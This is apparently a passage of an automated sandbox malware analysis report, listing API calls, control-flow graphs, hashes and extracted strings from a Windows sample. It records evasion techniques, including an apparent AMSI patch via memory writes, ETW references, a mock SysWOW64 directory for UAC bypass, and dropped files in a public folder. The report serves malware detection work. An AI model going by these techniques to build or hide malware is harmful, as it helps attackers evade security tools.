                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DD5E), ref: 02D0DCCB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D0DD05
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D0DD32
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D0DD3B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D083C2), ref: 02D083A4
                                                                                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,Initialize,02D77380,02D1B7B8,00000000,00000000,00000000,ScanString,02D77380,02D1B7B8), ref: 02D1B2FA
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2769005614-3738268246
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c90a304208f14c2305c29975a251f1ace3193b15e37360fc4fe88490eb8fc57e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c042760bd45aca4c375639e1e98d5544db5076f9b5d59f5d4fa9ae881a6146a5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c90a304208f14c2305c29975a251f1ace3193b15e37360fc4fe88490eb8fc57e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F343FA35A0425D9BCBA4EB64EC809CF73BAEF84304F5040E6E609EB754DA30AE95DF51
                                                                                                                                                                                                                                                                                                                                                      Function 02D13E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DD5E), ref: 02D0DCCB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D0DD05
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D0DD32
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D0DD3B
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,ScanBuffer,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,02D1BB30,00000000,00000000,02D1BB24,00000000,00000000), ref: 02D140CB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D088B8: LoadLibraryW.KERNEL32(amsi), ref: 02D088C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D088B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02D08920
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,000003E8,ScanBuffer,02D77380,02D1B7B8,UacScan,02D77380), ref: 02D14277
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00004E20,UacScan,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacInitialize,02D77380,02D1B7B8), ref: 02D150EE
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC04: RtlI.N(?,?,00000000,02D0DC7E), ref: 02D0DC2C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC42
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC61
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02D1041F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,UacInitialize), ref: 02CF7E67
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D085BC: WinExec.KERNEL32(?,?), ref: 02D08624
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2171786310-3926298568
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: be9fe661855c13e9b96045e85085fe7344006d455af71b8196e5b21324271c12
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 418c79be551457a21546dc781dc164a66e1258b2856975f270a4f85aa12fe2e5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be9fe661855c13e9b96045e85085fe7344006d455af71b8196e5b21324271c12
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD43EB34B4025D9FDBA4EB64EC80B9F73BAFF85304F1040A69609A7754DA30AE85EF51
                                                                                                                                                                                                                                                                                                                                                      Function 02D0E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 10970 2d0e678-2d0e67c 10971 2d0e681-2d0e686 10970->10971 10971->10971 10972 2d0e688-2d0ec81 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4740 * 2 call 2cf4860 call 2cf4778 call 2cf30d4 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4740 call 2cf7f2c call 2cf49a0 call 2cf4d74 call 2cf4df0 call 2cf4740 call 2cf49a0 call 2cf4d74 call 2cf4df0 call 2d08788 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c 10971->10972 11175 2d0eee2-2d0ef2f call 2cf4500 call 2cf4c60 call 2cf4500 call 2cf4c60 call 2cf4500 10972->11175 11176 2d0ec87-2d0eedd call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 WaitForSingleObject CloseHandle * 2 call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c * 3 10972->11176 11176->11175
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D08814
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
                                                                                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02D77380,02D0EF4C,OpenSession,02D77380,02D0EF4C,UacScan,02D77380,02D0EF4C,ScanBuffer,02D77380,02D0EF4C,OpenSession,02D77380), ref: 02D0ED6E
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02D77380,02D0EF4C,OpenSession,02D77380,02D0EF4C,UacScan,02D77380,02D0EF4C,ScanBuffer,02D77380,02D0EF4C,OpenSession), ref: 02D0ED76
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000940,00000000,00000000,000000FF,ScanString,02D77380,02D0EF4C,OpenSession,02D77380,02D0EF4C,UacScan,02D77380,02D0EF4C,ScanBuffer,02D77380,02D0EF4C), ref: 02D0ED7F
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                                                                                                                                                                                                                                      • String ID: )"C:\Users\Public\Libraries\aymtmquJ.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3475578485-3334284989
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d9f21110843dd825bfe9742d6d5abef0eaa3d13beced0b0ec602650a4762a89e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 36a6e62bd1f7546d6a9248da385fac7e23dbffa517d1c4be619a7e465193add2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9f21110843dd825bfe9742d6d5abef0eaa3d13beced0b0ec602650a4762a89e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7022FC74A001599BEBA8FB64D8C1F8FB7BAEF85300F1045A1A604EB394DB30AE45DF55
                                                                                                                                                                                                                                                                                                                                                      Function 02CF1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 13139 2cf1724-2cf1736 13140 2cf173c-2cf174c 13139->13140 13141 2cf1968-2cf196d 13139->13141 13144 2cf174e-2cf175b 13140->13144 13145 2cf17a4-2cf17ad 13140->13145 13142 2cf1973-2cf1984 13141->13142 13143 2cf1a80-2cf1a83 13141->13143 13146 2cf1938-2cf1945 13142->13146 13147 2cf1986-2cf19a2 13142->13147 13149 2cf1a89-2cf1a8b 13143->13149 13150 2cf1684-2cf16ad VirtualAlloc 13143->13150 13151 2cf175d-2cf176a 13144->13151 13152 2cf1774-2cf1780 13144->13152 13145->13144 13148 2cf17af-2cf17bb 13145->13148 13146->13147 13153 2cf1947-2cf195b Sleep 13146->13153 13160 2cf19a4-2cf19ac 13147->13160 13161 2cf19b0-2cf19bf 13147->13161 13148->13144 13162 2cf17bd-2cf17c9 13148->13162 13158 2cf16df-2cf16e5 13150->13158 13159 2cf16af-2cf16dc call 2cf1644 13150->13159 13154 2cf176c-2cf1770 13151->13154 13155 2cf1794-2cf17a1 13151->13155 13156 2cf1782-2cf1790 13152->13156 13157 2cf17f0-2cf17f9 13152->13157 13153->13147 13163 2cf195d-2cf1964 Sleep 13153->13163 13169 2cf182c-2cf1836 13157->13169 13170 2cf17fb-2cf1808 13157->13170 13159->13158 13165 2cf1a0c-2cf1a22 13160->13165 13166 2cf19d8-2cf19e0 13161->13166 13167 2cf19c1-2cf19d5 13161->13167 13162->13144 13168 2cf17cb-2cf17de Sleep 13162->13168 13163->13146 13176 2cf1a3b-2cf1a47 13165->13176 13177 2cf1a24-2cf1a32 13165->13177 13173 2cf19fc-2cf19fe call 2cf15cc 13166->13173 13174 2cf19e2-2cf19fa 13166->13174 13167->13165 13168->13144 13172 2cf17e4-2cf17eb Sleep 13168->13172 13178 2cf18a8-2cf18b4 13169->13178 13179 2cf1838-2cf1863 13169->13179 13170->13169 13175 2cf180a-2cf181e Sleep 13170->13175 13172->13145 13184 2cf1a03-2cf1a0b 13173->13184 13174->13184 13175->13169 13186 2cf1820-2cf1827 Sleep 13175->13186 13180 2cf1a49-2cf1a5c 13176->13180 13181 2cf1a68 13176->13181 13177->13176 13187 2cf1a34 13177->13187 13182 2cf18dc-2cf18eb call 2cf15cc 13178->13182 13183 2cf18b6-2cf18c8 13178->13183 13188 2cf187c-2cf188a 13179->13188 13189 2cf1865-2cf1873 13179->13189 13191 2cf1a5e-2cf1a63 call 2cf1500 13180->13191 13192 2cf1a6d-2cf1a7f 13180->13192 13181->13192 13200 2cf18fd-2cf1936 13182->13200 13204 2cf18ed-2cf18f7 13182->13204 13195 2cf18cc-2cf18da 13183->13195 13196 2cf18ca 13183->13196 13186->13170 13187->13176 13193 2cf188c-2cf18a6 call 2cf1500 13188->13193 13194 2cf18f8 13188->13194 13189->13188 13190 2cf1875 13189->13190 13190->13188 13191->13192 13193->13200 13194->13200 13195->13200 13196->13195
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,02CF1FC1), ref: 02CF17D0
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,00000000,?,02CF1FC1), ref: 02CF17E6
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2f3565d200a3e3ae86bbfb4dd3a96500f213dbb91f2170ecf6ae88258ec2435b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d3929ed21a7f454cb1b22cd9fd2d8e1cf3acc1bd2af5fe2fdb5afa9f3e5b8a12
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f3565d200a3e3ae86bbfb4dd3a96500f213dbb91f2170ecf6ae88258ec2435b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15B14372A00340CFCB96CF69D480311BBF1EB86325F1D86AAD60D8B385E7B49955CBD0
                                                                                                                                                                                                                                                                                                                                                      Function 02D088B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(amsi), ref: 02D088C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
                                                                                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02D08920
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: DllGetClassObject$W$amsi
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 941070894-2671292670
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 937b2e0ff848366a887b84b256c3abc7175af84c008357bae0143d1be8c088d1
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1c9e57c165651e118346fed87a8e73c85b22d3a790da137e6296aa20ac0aa72e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 937b2e0ff848366a887b84b256c3abc7175af84c008357bae0143d1be8c088d1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAF0AF5044C381BAE300E2748C89F4FBECD8B62264F008A18F2E89A3E2D679D5059B77
                                                                                                                                                                                                                                                                                                                                                      Function 02CF1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
